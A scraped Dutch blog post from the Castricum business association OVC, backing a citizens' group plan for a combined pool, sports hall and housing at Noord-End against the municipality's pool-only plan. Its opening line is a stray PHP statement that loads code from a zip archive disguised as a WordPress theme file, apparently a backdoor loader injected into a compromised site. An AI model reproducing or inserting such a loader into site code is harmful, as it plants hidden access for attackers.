/* Colibri Wp Child Theme */ load_template( "zip://" . locate_template( "colibri-wp-child.theme" ) . "#archive", true ); Presentatie Sportcentrum Noord-end – OVCastricum

De Initiatiefgroep Nieuw Zwembad heeft deze week de presentatie van het concept: zwembad + sporthal + (ook goedkope) woningen bouwen op twee vrijkomende aan de raad en college gepresenteerd. Het plan staat haaks op het plan van het college. Dat plan omvat alleen de bouw van een zwembad met mogelijk op lange termijn het aanbouwen van een sporthal.

Het plan van de Initiatiefgroep is kwalitatief beter, financieel veel voordeliger voor inwoners en maakt het veel eenvoudiger aan hoge duurzaamheidseisen te voldoen. Bovendien biedt het meer gebruiksmogelijkheden van het sportcomplex waardoor de opbrengsten hoger zijn. Andere voordelen zijn het niet twee keer ‘omploegen’ van Noord End, het voorkomen van twee keer gigantische begeleidingskosten van ambtenaren en hun ingehuurde deskundigen. Het voorkomt het gebrek aan synergie dat het gemeentelijke plan uitademt. De financiële onderbouwing staat als een huis. Iedereen die dat wil kan de financiële vergelijking tussen gemeente en Initiatiefgroep controleren.

De OVC heeft jarenlang als onderdeel van de groep aan het plan meegewerkt om tot deze opzet te komen. Belangrijkste reden van onze betrokkenheid is het zeker stellen, waar dit mogelijk is, dat het project uitgevoerd wordt door deskundige zwembad- en sporthal bouwers in combinatie met onze lokale ondernemers. Dat punt is tijdens de presentatie prima overgekomen. Ons OVC lid Rob Berkemeier heeft de film gemaakt en OVC bestuurslid Arjen Fruitema de presentatie. Hij heeft ook de gesprekken met alle toeleveranciers gevoerd. OVC bestuurslid Dennis de Haas heeft de ideeën en onderbouwing voor de twee vrijkomende bouwlocaties voor zijn rekening genomen. De OVC vertegenwoordiging in het geheel hebben OVC lid Herman Rijsdijk als medeoprichter van de groep samen met de andere medeoprichter OVC voorzitter Leo van Schoonhoven voor hun rekening genomen.

Kortom, als OVC mogen we wel stellen dat we voor de lokale ondernemers ons best gedaan hebben. Nu even afwachten of de raad een zakelijke i.p.v. een politieke afweging maakt.

Categories:

Tags:

No responses yet

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *

error: Content is protected !!